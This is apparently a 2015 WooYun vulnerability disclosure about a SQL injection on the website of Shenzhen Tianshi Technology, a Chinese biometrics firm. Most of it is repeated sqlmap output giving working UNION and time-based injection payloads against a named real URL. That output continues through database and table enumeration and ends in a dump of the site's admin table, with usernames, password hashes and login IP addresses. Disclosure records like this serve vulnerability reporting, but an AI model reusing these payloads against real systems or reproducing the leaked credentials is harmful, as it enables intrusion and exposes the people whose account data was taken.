漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
									2015-08-28:	积极联系厂商并且等待厂商认领中,细节不对外公开
									2015-10-12:	厂商已经主动忽略漏洞,细节向公众公开
								
简要描述:
天识科技
深圳市天识科技有限公司,是中国信息安全及生物识别行业最具影响力的产品和服务供应商,是中国科技开发院的下属骨干企业。目前拥有的“SUPIDENT/天识”品牌是中国信息安全和生物识别行业最具影响力的品牌之一。公司的产品获得多项国家专利,公司的全线生物识别产品拥有完全的自主知识产权,具备国家信息安全工程服务资质。
from:http://www.freebuf.com/jobs/75863.html   招人的...
详细说明:
主站
http://www.supident.com/?f=show&catid=23&id=145  sqlmap下就行了
sqlmap identified the following injection points with a total of 185 HTTP(s) requests:
---
Place: GET
Parameter: catid
    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: f=show&catid=23 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7871773a,0x7a4c437646777353486c,0x3a7066753a)#&id=145
    Vector:  UNION ALL SELECT NULL, [QUERY]#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: f=show&catid=23 AND SLEEP(5)&id=145
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: catid
    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: f=show&catid=23 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7871773a,0x7a4c437646777353486c,0x3a7066753a)#&id=145
    Vector:  UNION ALL SELECT NULL, [QUERY]#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: f=show&catid=23 AND SLEEP(5)&id=145
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
database management system users [1]:
[*] 'bdm0200082'@'%'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: catid
    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: f=show&catid=23 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7871773a,0x7a4c437646777353486c,0x3a7066753a)#&id=145
    Vector:  UNION ALL SELECT NULL, [QUERY]#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: f=show&catid=23 AND SLEEP(5)&id=145
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
available databases [2]:
[*] bdm0200082_db
[*] information_schema
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: catid
    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: f=show&catid=23 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7871773a,0x7a4c437646777353486c,0x3a7066753a)#&id=145
    Vector:  UNION ALL SELECT NULL, [QUERY]#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: f=show&catid=23 AND SLEEP(5)&id=145
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
Database: bdm0200082_db
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| jo2_file    | 199     |
| jo2_content | 106     |
| jo2_cate    | 26      |
| jo2_message | 5       |
| jo2_user    | 4       |
| jo2_admin   | 3       |
| jo2_link    | 2       |
| jo2_config  | 1       |
+-------------+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: catid
    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: f=show&catid=23 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7871773a,0x7a4c437646777353486c,0x3a7066753a)#&id=145
    Vector:  UNION ALL SELECT NULL, [QUERY]#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: f=show&catid=23 AND SLEEP(5)&id=145
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
Database: bdm0200082_db
Table: jo2_admin
[3 entries]
+--------+---------+---------+---------+---------+---------+----------+----------+----------+----------------------------------+------------+----------------+---------------+
| userid | prv     | bumen   | zhiwu   | email   | dianhua | username | disabled | fullname | password                         | logintimes | lastloginip    | lastlogintime |
+--------+---------+---------+---------+---------+---------+----------+----------+----------+----------------------------------+------------+----------------+---------------+
| 1      | <blank> | 客户支持部   | <blank> | <blank> | <blank> | admin    | 0        | 天识管理员    | 300343cb7bcf52581e96270be334fa61 | 352        | 115.71.5.205   | 1440494216    |
| 10     | 1       | 技术部     | 经理      | <blank> | <blank> | zonvon   | 0        | 小兵       | b8b186e835fbaec5bdd44d49fb4f5023 | 0          | NULL           | NULL          |
| 11     | Array   | <blank> | <blank> | <blank> | <blank> | duihao   | 0        | <blank>  | b8b186e835fbaec5bdd44d49fb4f5023 | 1          | 221.221.11.230 | 1315028821    |
+--------+---------+---------+---------+---------+---------+----------+----------+----------+----------------------------------+------------+----------------+---------------+
你们对于自己的主站不做防御?  
ok 
漏洞证明:
···
修复方案:
···
版权声明:转载请注明来源 爱上平顶山@乌云
>
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝

 
                